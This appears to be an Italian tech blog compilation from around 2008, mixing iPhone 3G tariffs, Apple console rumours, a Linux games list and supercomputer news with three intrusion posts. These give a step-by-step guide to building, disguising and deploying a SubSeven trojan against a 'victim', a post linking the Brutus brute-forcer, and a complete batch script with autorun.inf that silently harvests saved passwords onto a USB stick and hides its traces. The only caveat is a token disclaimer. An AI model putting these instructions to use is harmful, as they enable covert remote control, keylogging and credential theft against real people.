Apple sta preparando una console?

Apple sta preparando qualcosa di grosso nel campo dei giochi?
Le voci e le illazioni in questo senso si stanno facendo sempre più numerose, come viene riassunto in questo recente articolo di Repubblica.it.
Le voci si fondano su una notizia apparsa sul sito Trademork, secondo la quale Apple all’inizio di febbraio avrebbe modificato il proprio oggetto sociale, includendo fra i suoi prodotti anche le console per videogiochi.

A questo si era aggiunto anche un annuncio, apparso proprio sul sito Apple: la società di Cupertino è alla ricerca di esperti in videogiochi. Insomma, due indizi non fanno una prova ma forse qualcosa c’è.

Ecco allora che molti hanno iniziato a pensare che Apple stia sviluppando una sua piattaforma per videogiochi, in aperta concorrenza con Sony, Nintendo e, sopratutto, Microsoft.
E qualcun altro, dotato di buona memoria storica, ha ricordato che Apple un tentativo, in questo senso, lo aveva già fatto più di 10 anni fa, nel lontano 1995, allorché presentò la sua piattaforma Pippin (nella foto), in collaborazione con Bandai. Fu un flop e finì presto nel nulla.

Il mercato dei videogiochi e delle console è immenso e naturalmente fa gola a tanti, ma sono tanti i casi di insuccesso. Se Apple se l’è cavata a buon mercato col fiasco di Pippin, per altri marchi il bagno di sangue è stato ben più pesante.

E poi, siamo davvero sicuri che nei progetti di Apple ci sia una nuova piattaforma? Un nuovo prodotto, che magari si chiamerà iConsole, iGame, o iPlay? Magari sì, al momento tutte le ipotesi sono valide.
Però non bisogna dimenticare che una piattaforma Apple ce l’ha: iPhone, iPod, iPod touch… È la tesi sostenuta nei giorni scorsi da Chris Kohler di Wired. Mentre Roger Ehrenberg, della società di ricerche di mercato Information Arbitrage, avanza una terza ipotesi: che Apple stia pensando all’uso ludico dell’iPhone per il breve periodo, ma solo in vista del lancio di una sua nuova piattaforma specializzata per i videogiochi (i due punti di vista sono riassunti in questo post di Cult of Mac).

Insomma: i giochi sembrano ancora tutti aperti.

Fonte: AppleMania

iPhone di Tim: ecco le tariffe

Finalmente sono arrivate, tutti le attendevamo e TheAppleLounge, il blog dedicato al mondo Apple del network iSayBlog!, le ha presentate in anteprima. Come specificato dal loro articolo, si tratta di una soffiata arrivata da fonti interne a TIM, pertanto non essendo ufficiali, potrebbero differire leggermente da quelle che saranno comunicate a breve.

Le tariffe disponibili per l’iPhone 3G sono principalmente cinque: iPhone Starter, TIM 250, TIM 600, TIM 900 e TIM Unlimited; scegliendo una di queste tariffe l’iPhone 3G da 8Gb vi può costare fino a 199euro, ma scegliendo la tariffa TIM Unlimited, lo potrete avere gratuitamente. Vediamo ora nel dettaglio le varie offerte.

iPhone Starter: costo mensile di 30 euro per 24 mesi. Le chiamate verso i numeri nazionali, sia fissi che mobili, prevedono un costo di 15 centesimi di euro al minuto e uno scatto alla risposta di 19 centesimi, gli sms, invece, costeranno 19 centesimi. L’offerta prevede un Bundle di 1Giga di traffico internet con APN inbox.tim.it. Il prezzo dell’iPhone 3G da 8giga sarà di 199 euro, mentre la versione da 16 giga costerà 269 euro.

TIM 250: con un costo mensile di 50 euro, con obbligo a 24 mesi e pagamento anticipato tramite carta di credito o conto bancario, vi viene fornito un Bundle di 250 minuti di chiamate nazionali verso fissi e mobili, senza scatto alla risposta, un Bundle di 100 SMS nazionali verso tutti e sempre un Bundle di 1Giga di traffico internet con APN inbox.tim.it. Il prezzo dell’iPhone 3G da 8giga sarà di 189 euro, mentre la versione da 16 giga costerà 259 euro.

TIM 600: con un costo mensile di 80 euro, con obbligo a 24 mesi e pagamento anticipato tramite carta di credito o conto bancario, vi viene fornito un Bundle di 600 minuti di chiamate nazionali verso fissi e mobili, senza scatto alla risposta, un Bundle di 250 SMS nazionali verso tutti e sempre un Bundle di 1Giga di traffico internet con APN inbox.tim.it. Il prezzo dell’iPhone 3G da 8giga sarà di 149 euro, mentre la versione da 16 giga costerà 219 euro.

TIM 900: con un costo mensile di 110 euro, con obbligo a 24 mesi e pagamento anticipato tramite carta di credito o conto bancario, vi viene fornito un Bundle di 900 minuti di chiamate nazionali verso fissi e mobili, senza scatto alla risposta, un Bundle di 700 SMS nazionali verso tutti, escluso TRE. Un Bundle di 200 SMS verso TRE e sempre un Bundle di 1Giga di traffico internet con APN inbox.tim.it. Il prezzo dell’iPhone 3G da 8giga sarà di 99 euro, mentre la versione da 16 giga costerà 169 euro.

TIM Unlimited: con un costo mensile di 200 euro, con obbligo a 24 mesi e pagamento anticipato tramite carta di credito o conto bancario, vi viene fornito un Bundle di 4500 minuti di chiamate nazionali verso fissi e mobili, senza scatto alla risposta, escluso TRE. Bundle di 500 muniti di chiamate voce nazionali verso l’operatore TRE senza scatto alla risposta. Bundle di 1200 SMS nazionali verso tutti, escluso TRE. Bundle di 300 SMS nazionali verso TRE. Bundle di 5Giga di traffico internet con APN inbox.tim.it. Il prezzo dell’iPhone 3G da 8giga sarà di 0 euro, mentre la versione da 16 giga costerà 69 euro.

Come vedete ecco i classici prezzi all’italiana.

Compila il questionario e ti ricarichi il cell!

swg

La SWG sta conducendo, per conto del “Comitato Regionale per le Comunicazioni” (CoReCom), un’indagine sul mondo dei giovani nel loro rapporto con i media e la società in genere.

La ricerca ha come obiettivo principale quello di offrire alle famiglie, alle scuole e alle istituzioni politiche e sociali uno strumento per conoscere e confrontarsi con i giovani focalizzando l’attenzione su aspetti del mondo giovanile spesso "oscuri" al pubblico adulto.

Qualunque informazione darai è garantito che verrà trattata in forma strettamente personale.

Basta compilare con attenzione (non a caso) il questionario in ogni sua parte.

La compilazione dura circa 15 minuti e dà diritto a una ricarica telefonica da 5 euro (TIM, Vodafone, WIND o 3).

Per partecipare all’indagine clicca qui:
http://panel.swg.it/SWGCATI/InternetCATI.exe?IDQ=300161&IDU=9999

84 giochi gratuiti per Linux

Parliamo di Linux, il sistema operativo open source, per il quale si è sempre detto che non vi sono giochi “decenti”, quelli in grafica 3D  che siamo abituati a vedere

Per questo oggi vi presento 84 giochi creati per Linux per farvi ricredere:

Azione:

Alien Arena 2008 Spettacolare shooter

AstroMenace Shooter spaziale

Nexuiz Shooter in prima persona multiplayer

OpenArena Basato su Quake III Arena

Secret Maryo Chronicles Clone di Super Mario

Tremulous Shooter in prima persona con alieni contro umani

Urban Terror Shooter in prima persona

Warsow Ottimo Shooter in prima persona

AssaultCube Shooter in prima persona basato su Cube

Excalibur: MR Shooter fantasy in prima persona

Hexen II: HT Port di Hexen II

TrueCombat:Elite Versione modificata di Wolfenstein:ET

Vega Strike Gioco di azione spaziale in 3D

Wolfenstein: ET Combattimenti di gruppo

World of Padman Versione modificata di Quake III Area

X-Moto Platform in 2D

Arcade:

Armagetron Advanced Versione migliorata di Armagetron

Critical Mass Shoot’em up spaziale

ManiaDrive Clone di Trackmania in 3D

Stepmania Gioco musicale

SuperTuxKart Corsa automobilistica in 3D

Wormux Clone di Worms

Chromium B.S.U Shooter spaziale

Kobo Deluxe Shooter in 2D

LBreakOut2 Clone di Arkanoid

OpenLieroX Clone di Worms con supporto per la rete

Penguin Command Clone del classico “Missile Command”

GDR:

Crossfire GDR/avventura multiplayer

Daimonin GDR on-line

NetHack Dungeon

Egoboo Variante di Nethack e Rogue

Eternal Lands MMORPG tipo RuneScape

Planeshift MMORPG fantasy in 3D

Project Diaspora Clone di Diaspora, un MMORPG

Regnum Online MMORPG fantasy in 3D

RuneScape MMORPG basato su Java

Strategia:

Battle Tanks Guerra fra carri armati multiplayer

Bos Wars Gioco futuristico

BZFlag Shooting in prima persona

Crimson Fields Gioco di guerra sulla scia di Battle Isle

Globulation 2 Innovativo gioco di strategia in tempo reale

HedgeWars Clone di Worms

netPanzer Gioco di tattica in tempo reale

Savage 1 Mix tra shooter e strategico

Battle for Wesnoth Gioco fantasy dove controllare villaggi

Freeciv Costruzione di imperi

FreeCol Implementazione di Colonization

FreeOrion Conquiste galattiche

Glest Strategia in tempo reale 3D

Scorched 3D Basato sul grande classico Scorched Earth

Spring Total Annihilation (TA) in 3D

UFO: Alien Invasion Ispirato ad X-COM

Warzone 2100 RP Futuristico in 3D

Simulazione:

Danger from the Deep Le tattiche dei sottomarini tedeschi nella seconda guerra mondiale

GL-117 Simulatore di volo in 3D

Oolite Simulazione spaziale retrò

Racer Simulazione automobilistica con rispetto delle reali leggi della fisica

VDrift Simulazione automobilistica

FlightGear Simulazione di volo

Frets On Fire Simulazione musicale

OpenTTD Clone di “Transport Tycoon Deluxe”

TORCS Simulazione automobilistica

Sport:

FooBillard Gioco di biliardo realistico

Slam Soccer 2006 Calcio in stile cartoon

Bygfoot Manageriale

Giochi di carte e da tavolo:

gnubg Backgammon

PokerTH Texas hold’em poker

PySolFC Oltre 1000 solitari

Atlantik Monopoly

KMahjongg Mahjongg

PyChess Scacchi

Puzzle:

Fish Fillets NG Port di Fish Fillets di Altar Interactive

Frozen Bubble Clone di Puzzle Bubble

Neverball Guidare una sfera su vari percorsi

Pingus Clone di Lemmings

Crack Attack! Simile a “Tetris Attack”

Enigma Unire le gemme colorate

gbrainy Giochi aritmetici e logici

Engine:

GemRB Clone di Infinity Engine

Sauerbraten Motore di gioco 3D

ScummVM Permette di giocare a varie vecchie avventure 3D (i.e. Monkey Island)

Crystal Space Toolkit di gioco 3D

Delta3D Motore educativo e ricreativo

Educazione:

GCompris Attività per persone dai 2 ai 10 anni

Tramite: LinuxLinks & LinuxLinks & geekissimo

Tim si prepara per l’iPhone

Ho già detto del comunicato stampa di Vodafone e Tim che annuncia la collaborazione con Apple e i prezzi per l’iPhone; da parte di TIM invece tutto tace, almeno per il momento.

Solo un indizio che fa pensare come si stiamo preparando. Il sottodominio iphone.tim.it risulta protetto da una maschera, operazione che si fa spesso quando si sta lavorando su nuove pagine ma si vogliono tenere nascoste.

Riguardo a Vodafone ha già dato notizie, cosa farà TIM? –>AGGIORNAMENTO!!!

Offerta Vodafone: iPhone 3G, prenotalo!

Sul sito della Vodafone da ieri è possibile “prenotare” il proprio iPhone 3G.

Tramite veloce registrazione si può ricevere in anteprima sulla propria
e-mail tutti i dettagli sull’offerta Vodafone e le informazioni per essere tra i primi ad acquistare il nuovo iPhone 3G da 8GB (499 euro) o da 16GB (569 euro).

Dal sito Vodafone:

11.07.08

Puoi ricevere in anteprima sulla tua
e-mail tutti i dettagli sull’offerta Vodafone e le informazioni per essere tra i primi ad acquistare il nuovo iPhone 3G da 8GB o da 16GB.

Scegliendo un piano Ricaricabile per Privati potrai acquistare direttamente
sullo Shop online l’iPhone 3G da 8GB
a 499 euro
e l’iPhone 3G da 16GB
a 569 euro
.

Con gli abbonamenti iPhone Vodafone
Facile avere l’iPhone è ancora più vantaggioso!
Chiedi informazioni nei Punti Vendita Vodafone.

E se hai la Partita IVA, richiedi i dettagli sull’offerta iPhone Vodafone
Mio Business Tutto a te dedicata.

Tutte le informazioni per Privati e Business in anteprima sulla tua e-mail!

La Vodafone ha anche creato http://ifone.vodafone.it/ per chi ifone lo legge e lo scrive. (vedi: Totti)!!!

Per Tim si sà poco e nulla… —> AGGIORNAMENTO!!!

Link: iphone.vodafone.it

Technorati Tags: ,,,,

AGGIORNAMENTO:

L’iPhone 3G sarà presentato in Italia il prossimo 11 Luglio.  In questi giorni Vodafone ha rilasciato un comunicato stampa dove vengono dati i primi prezzi di questo gioiellino di casa Apple.

Nel comunicato stampa, si legge:

L’iPhone 3G sarà disponibile sia per i clienti in abbonamento, con disponibilità di piani tariffari particolarmente semplici, che per i clienti con sim ricaricabile, ed è prevista una vasta gamma di offerte dati. Scegliendo un piano in abbonamento, come iPhone Vodafone Facile, sarà possibile ad esempio acquistare un telefono di Apple ad un prezzo particolarmente vantaggioso. Coloro che preferiranno il piano ricaricabile per utenti privati potranno acquistare iPhone 8GB a 499€ e il modello da 16GB a 569€.

I prezzi sono diversi da quelli comunicati da Steve Jobs durante il WWDC. Nella conferenza era stato dato come prezzo massimo, per la versione da 8GB, 199$ mentre per la versione da 16GB, come prezzo massimo, 299$.

Si spera che Vodafone o Tim creino un piano tariffario flat per internet conveniente altrimenti che senso ha avere un iPhone umts che non si può usare a causa del prezzo?

Roadrunner, il nuovo supercomputer

Roadrunner è diventato il più potente computer al mondo ed è stato installato presso i Los Alamos National Laboratory, nel Nuovo Messico. La sua potenza di calcolo supera il PetaFLOP al secondo ( 1 PetaFLOP = un milione di miliardi di istruzioni/calcoli al secondo ).
Il precedente record era attribuito al BlueGene/L di IBM. Roarunner è stato sviluppato da IBM, Sony e Toshiba ed è costituito da 116640 core di elaborazione per un totale di 12960 processori Cell (processori AMD Opteron). Il nuovo sistema sarà messo a disposizione per ricerche militari e scientifiche.
I processori Cell agiscono come se fossero una sorta di "acceleratori" per alcune porzioni di calcolo. Complessivamente il sistema consuma circa tre megawatt di potenza, non molto distante dal dispendio energetico di un centro commerciale di medie dimensioni. I costi complessivi per l’installazione di Roadrunner ammontano a circa 133 milioni di dollari.

Tratto dal commento di “Delfino” su methack:

Non ha una scheda grafica vera e propria smileysmiley
Dispone 80 TeraByte (=80.000 GigaByte smiley smiley smiley ) di memoria e (udite udite!!!) ha RED HAT ENTERPRISE LINUX come sistema operativo.
Questo è il link wikipedia (in inglese)…
Bella anche questa citazione/esempio di Thomas P. D’Agostino, l’amministratore del National Nuclear Security Administration

Se tutti i sei miliardi di persone presenti sulla Terra usassero contemporaneamente una calcolatrice tascabile per 24 ore al giorno, sette giorni su sette, avrebbero bisogno di 46 anni per fare le stesse operazioni che Roadrunner è in grado di eseguire in un giorno.

(click sull’immagine x ingrandire)

Fonte: methack.it

Technorati Tags: ,,,

Guida Trojan: SubSeven 2.2, il controllo remoto nascosto alla portata di tutti

I cavalli di Troia sono per molti aspetti comuni programmi per il controllo remoto con la sola unica differenza che i Trojan non si svelano all’utente che ospita il server. Il loro funzionamente è semplicissimo, una qualsiasi applicazione contiene una sotto-applicazione che prende il controllo della macchiana su cui viene fatta girare.

I Trojan aprono delle porte di comunicazione sia in entrata che in uscita, in modo che ogni volta che il pc infetto si connette, possano inviare tutte le informazioni della macchina e su cui è installato e attendere i comandi dell’attaccante.
In questo articolo mi limiterò a descrivere e guidare nell’uso di SubSeven, questo Trojan permette l’upload e il download dei file dalla macchian infetta, permette di agire sul filesystem come meglio si crede, l’esecuzione di programmi, la cattura di screanshot del desktop, il log di tutti i tasti premuti, la cancellazione di interi hard-disk ecc…
Attualmente sono conusciute undici versioni diverse, ciascuna con un proprio sistema di infezione ma con funzioni similari.

L’ultima versione è la 2.2 potete scaricarla da QUI!
Dopo aver estratto i file, miraccomando di disattivare l’antivirus durante l’uso altrimenti non riuscirete a lavorare. Partiamo con creare un server che poi dovrà essere inviato alla vittima, miraccomando di non aprire il server sul vostro PC se non sapete quello che state facendo. Per creare un server dobbiamo usare EDIT SERVER.EXE, si aprirà una finesta con due bottoni:

  1. Run Normal Mode
  1. Run Advanced Mode.

La prima va benone, adesso ci sono 8 menu sulla sinistra:

  • Server Settings

Potete settare il nome della vittima, il numero di porta, il nome del server, vi consiglio di spuntare “melt server after installation”, serve per nascondere il server avvenuta l’installazione.

  • Startup methods

Potete settare il metodo di avvio del server sulla macchina, spuntate le prime quattro opzioni.

  1. Notifications

Settate il metodo di notifica, via ICQ, via e-mail, via Mirc, non appena la vittima si collegherà vi arriverà un messaggio col numero IP della macchina.

  • Blinded Files

Per camuffare l’exe del server è possibile unirlo ad un altro exe.

  • Plugins

I plugins si possono inserire anche dopo essere collegati alla vittima e servono per il completo funzionamento di SubSeven.

  • Restrictions

Le restrizioni per il controllo di subseven, potete settarle in questo menu.

  • E-mail

In questo menù potete inserire la vostra mail dove riceverete messaggi di posta contenenti informazioni segrete e riservate come password.

  • Exe icon/other

Affinchè la vittima non si insospettisca potete cambiare l’icona del server, potete anche settare un messaggio di errore che spunterà subito dopo l’esecuzione del server, il vantaggio è che potete personalizzarlo come meglio credete, facendo passare il prog anche per una patch di MSN.
Dopo aver eseguito tutti questi passaggi, per salvare il server, cliccare su “save as…” e scrivere il nome del file.

Adesso possiamo passare al lato Client di SubSeven, dopo aver aperto il client vi apparirà una finestrella con 9 menù:

  • Shortcuts

E’ il client in versione essenziale, tutte le funzioni sintetizzate.

  • Connection

Permette di conoscere il pc della vittima, informazioni su di essa, ed è possibile cambiare anche delle impostazioni del server come ad esempio la password, la porta e tante altre cose…
– Connect commands ci permette di gestire tutte le connessioni.
– Scanner fa una scansione nella rete e permette di trovare macchine con SubSeven Server.

  • Keys/messages

E’ possibile aprire una finestra sul PC della vittima con la funzione “matrix”, così potete chattare con la vittima, con la funzione “msg manager” potete creare messaggi di errore da inviare alla vittima, “spy manager” permette di visualizzare i messaggi della vittima, con la funzione “icq takeover” è possibile prendere il controllo di ICQ.
– Keyboard ci rende possibile attivare e disattivare la tastiera, il keylogger ci visualizza tutti i tasti premuti dalla vittima.

  • Advanced

“Registry editor” permette di aprire l’editor di registro, “Ftp Server” ci apre la porta 21 ed è possibile collegarsi come un server ftp, “App redirect” può farci eseguire delle applicazioni sul PC della vittima, “Process Manager” ci fa visualizzare tutti i processi sulla macchina infetta, “Netstat” mostre le connessioni attive, “Port redirect” fa si che i dati su una certa porta vengano reindirizzati su un altro indirizzo IP a scelta.
-Find files ci fa fare una ricerca di qualsiasi file presente sulla macchina infetta e “Show found files” mostra i file trovati.
-Packet Sniffer è un semplice sniffer di pacchetti
-Password ci fa visualizzare tutte le password del PC.

  • Miscellaneous

La funzione “file manager” serve a controllare l’hard disk, cancellare, scaricare sul nostro PC tutti i dati che ci interessano, “windows manager” permette di vedere tutte le finestre aperte, “text-2speack” per far chiacchierare il PC, “clipboard manager” per guardare tutti gli appunti della nostra vittima e infine “print manager”, se la stampante è accesa possiamo divertirci a stampare tutto quello che vogliamo. [ROFL]

  • Fun manager

Per vedere lo scermo della vittima usiamo “sceen capture”, se invece vogliamo vedere il viso della vittima “webcam”, per capovolgere lo schermo “flip screan”, per aprire un indirizzo web nel browser “open browser”, “resolution” per decidere la risoluzione, “windows color” per cambiargli i colori, volete giocare a TRIS con la vittima bene usate la funzione “tic-tac-toe”.

  • Fun other

Volete riavviargli il picci usate “restart computer”, “mouse” e il suo mouse diventa vostro, “volume setting” per cambiare i settaggi audio, potete registrare audio dal suo microfono con “record mic”
e tante altre cosette carine…

  • Plugins

Ci permette di controllare i plugins

  • Local Option

Vari settaggi per cambiare il vostro client, se non volete lasciare tracce potete utilizzare un proxy.

  • Advanced

Qua possiamo disporre di uno script editor e di una lista di funzioni per tutti gli script.

P.S.

Per chi ha problemi con subseven, può in alternativa scaricare un TROJAN GRATUITO NON RICONOSCIUTO DA NESSUN ANTIVIRUS da QUI!

Fonte underground0 su wordpress

Technorati Tags: ,,,

Come gli hacker scoprono la password di una casella e-mail

Informazione per il pubblico.

Per rubarci le password i pirati informatici possono usare diversi metodi:

Il social engneering

Ne avevo già parlato in un precendente articolo (Come rubare le password di MSN), possono fingersi amministratori di database del provider, ci chiederanno user e password e dati anagrafici per il riorganizzo dei database inviandoci una mail con mittente tipo: amministratori_database@tuoprovider.com. Niente di più falso!

Keylogger o Backdoor e programmi di controllo remoto

I keylogger e le Backdoor sono dei sofware che si installano all’insaputa della vittima, loggano tutti i tasti premuti sulla tastiera e monitorano tutte le attività svolte, possono fare foto allo schermo, uppare e downloadare file, registrare ogni applicazione aperta e chiusa e inviare tutto alla mail del pirata.

I programmi di controllo remoto hanno tutte le caratteristiche delle Backdoor e dei Keylogger ma come la parola stessa lo dice hanno il pieno controllo della macchina.

Tratterò il mondo Keylogger e Controllo remoto in qualche articolo successivo. (Vedi: Backdoor –> su underground0.wordpress.com )

Attacco Brute force

Un soft che usa il brute force o forza bruta, utilizza un attacco che prova innumerevoli combinazioni alfanumeriche assieme a dei caratteri non stampabili fino a che non trova quella giusta.

Un programma che potete studiare è Brutus.

Scarica Brutus da –>QUI!

Vedi anche –> QUI!

Fonte underground0

Technorati Tags: Hacking,password,utility,software,freeware,msn

Rubare tutte le password di un computer con una chiavetta USB

image

( la foto non centra molto ma era simpatica….XD )

Il sito web Nirsoft fornisce diversi programmi gratuiti per recuperare le password salvate nel computer che si sta usando nel caso in cui le si dimenticano. E’ possibile però usare questi programmi gratuiti per altri scopi, come rubare le password del computer che si sta utilizzando.

Se un malintenzionato ha accesso fisico al computer da cui rubare le password, ha a disposizione solo pochi secondi per compiere l’”operazione”. Da questa necessità, ecco l’idea di usare una chiavetta USB. Con questo articolo, voglio semplicemente farvi vedere come sia facile creare una chiavetta USB che, inserita nel computer che ci interessa, salva le password trovate all’interno della chiavetta stessa.

Così facendo, basta collegare la chiavetta al computer che ci interessa, fare un semplice click e dopo qualche secondo staccare la chiavetta ed allontanarci dal computer con le password. Per realizzare questa chiavetta USB speciale, prima di tutto, create una cartella sul vostro desktop con il nome di Chiavetta. Questa cartella conterrà tutti i file che andranno copiati nella chiavetta.

Collegatevi alla pagina del sito web di Nirsoft per scaricare i programmi per recuperare le password. Vi consiglio di scaricare solo i programmi che vi recuperano le password che vi interessano. Se avete intenzione, ad esempio, di recuperare solo le password dei programmi di chat e quelli delle e-mail, scaricate i programmi MessenPass e Mail PassView.

Dopo aver scaricato i pacchetti con i programmi per recuperare le password, estraeteli nella cartella Chiavetta. In questa cartella lasciate solo i programmi veri e propri: cancellate, in breve, gli altri file come il readme.txt o la guida di utilizzo del programma.

A questo punto, scaricate ed installate l’ultima versione di Winrar. Andate su questa pagina e scaricate WinRAR. Dopo aver installato Winrar, andate su C:/Programmi/WinRAR, copiate ed incollate il programma Rar.exe nella cartella del desktop Chiavetta.

Adesso aprite il Blocco Note, e scrivete la seguente riga per ogni programma che recupera le password che avete inserito nella cartella Chiavetta:

@nomedelprogramma.exe /sverhtml nomedelprogramma.html

Al termine del file scrivete, invece, le righe:

REM Scrittura del file di log
@echo COMPUTERNAME = %COMPUTERNAME% > log.txt
@echo USERNAME = %USERNAME% >> log.txt
@echo USERDOMAIN = %USERDOMAIN% >> log.txt
@echo USERPROFILE = %USERPROFILE% >> log.txt
@echo. >> log.txt
@echo Oggi e’ %DATE% e sono le %TIME% >> log.txt

REM Compressione
@rar.exe a -pPASSWORD backup_%random%.rar *.html log.txt > nul

REM Eliminazione e celamento dei file usati
@del *.html
@del log.txt
@attrib +h *.exe
@attrib +h autorun.inf

In breve, quando avvierete questo piccolo programmino, le password verranno recuperate dal computer e salvate in diversi file .HTML. A questo punto, questi file HTML vengono inseriti in un archivio .RAR protetto da password. La password dell’archivio deve essere specificata al posto della parola PASSWORD.

La password è case sensitive: fanno differenza, quindi, le lettere maiuscole e quelle minuscole. Alla fine i programmi utilizzati per recuperare le password vengono nascosti e le pagine HTML eliminate, poichè già inserite nell’archivio .RAR. Nel mio caso (programmi MessenPass e Mail PassView), ho scritto queste righe:

@mspass.exe /sverhtml mspass.html
@mailpv.exe /sverhtml mailpv.html

REM Scrittura del file di log
@echo COMPUTERNAME = %COMPUTERNAME% > log.txt
@echo USERNAME = %USERNAME% >> log.txt
@echo USERDOMAIN = %USERDOMAIN% >> log.txt
@echo USERPROFILE = %USERPROFILE% >> log.txt
@echo. >> log.txt
@echo Oggi e’ %DATE% e sono le %TIME% >> log.txt

REM Compressione
@rar.exe a -pPASSWORD backup_%random%.rar *.html log.txt > nul

REM Eliminazione e celamento dei file usati
@del *.html
@del log.txt
@attrib +h *.exe
@attrib +h autorun.inf

Alla fine, salvate il file con il nome lancia.bat: andate semplicemente su File/Salva file con nome… e, nella finestra che si apre, scrivete lancia.bat in Nome file. Il file deve essere salvato nella Chiavetta.

Dopo aver creato il file lancia.bat, create il file autorun.inf sempre con il Blocco note:

[autorun]
open=lancia.bat
action=Preleva password

A questo punto avete finito. Nella cartella troverete i seguenti file:

Contenuto chiavetta

Dovete semplicemente copiare tutti i file nella cartella principale della vostra chiavetta USB per concludere la sua creazione. Se volete fare delle prove, dopo aver copiato i file, estraete ed inserite la chiavetta. Verrà aperta la seguente finestra:

Chiavetta USB

Se selezionate la prima voce (Preleva password) e fate click sul tasto OK, le password del computer verranno salvate all’interno dell’archivio protetto .RAR. A questo punto, basta staccare la chiavetta ed andare in un computer sicuro con Winrar installato per leggere le password trovate.

L’articolo è puramente a scopo di studio e l’autore non si ritiene responsabile per eventuali usi impropri. Rubare password che non siano le proprie è illegale.

Fonte: blog di aranzulla

Foto di GlamGal su flickr.com